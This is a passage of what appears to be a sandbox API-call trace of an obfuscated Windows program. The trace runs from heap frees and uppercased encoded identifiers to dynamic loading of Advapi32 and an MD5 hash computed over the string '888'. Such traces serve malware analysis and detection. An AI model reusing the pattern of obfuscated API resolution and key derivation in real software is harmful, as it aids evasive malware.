lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0122.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0122.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0122.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0122.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0122.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0122.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0122.996] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0122.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0122.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0122.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0122.997] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0122.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0122.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0122.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0122.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0122.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0122.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0122.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0122.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0122.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0122.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0122.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0122.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0122.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0122.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0122.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0122.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0122.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0122.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0122.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0122.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0122.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0122.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0122.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0122.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0122.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0122.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0122.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0122.998] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0122.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0122.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0122.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0122.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0122.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0122.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0122.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0122.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0122.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0122.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0122.999] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0122.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0122.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0122.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0122.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0122.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0122.999] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0122.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0122.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0122.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0122.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0122.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0122.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0122.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0122.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0122.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0122.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0122.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0122.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0122.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0123.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0123.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0123.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0123.000] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0123.000] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0123.000] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0123.000] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0123.000] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0123.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f71a0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0123.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0123.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6ea0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0123.000] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9beab0) returned 1 [0123.001] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0123.001] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0123.001] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0123.001] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0123.001] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0123.001] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0123.001] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0123.001] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0123.002] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0123.002] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0123.002] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0123.002] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0123.002] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0123.002] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0123.002] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0123.002] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0123.002] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0123.002] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0123.002] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.002] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.002] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.002] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0123.002] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.002] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0123.002] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.002] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.003] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.003] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.003] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.003] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.003] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.003] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0123.003] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0123.003] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0123.003] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0123.003] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0123.003] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0123.003] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0123.003] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0123.003] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0123.003] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0123.003] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0123.003] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0123.003] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0123.003] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0123.003] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0123.003] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0123.003] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0123.004] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0123.004] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0123.004] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.004] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.004] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0123.004] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0123.004] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0123.004] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0123.004] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0123.004] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0123.004] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0123.004] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0123.004] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0123.004] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0123.004] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0123.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaa408, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0123.005] CryptCreateHash (in: hProv=0x9beab0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0123.008] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.009] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.009] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.009] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0123.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b58, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0123.009] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0123.009] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0123.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0123.009] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.009] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0123.009] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0123.009] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0123.009] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0123.009] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0123.009] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0123.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaa3c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0123.010] CryptHashData (hHash=0x9a4300, pbData=0x2a72748, dwDataLen=0x3, dwFlags=0x1) returned 1 [0123.010] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.010] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.010] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.010] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0123.010] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0123.010] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0123.010] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0123.010] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 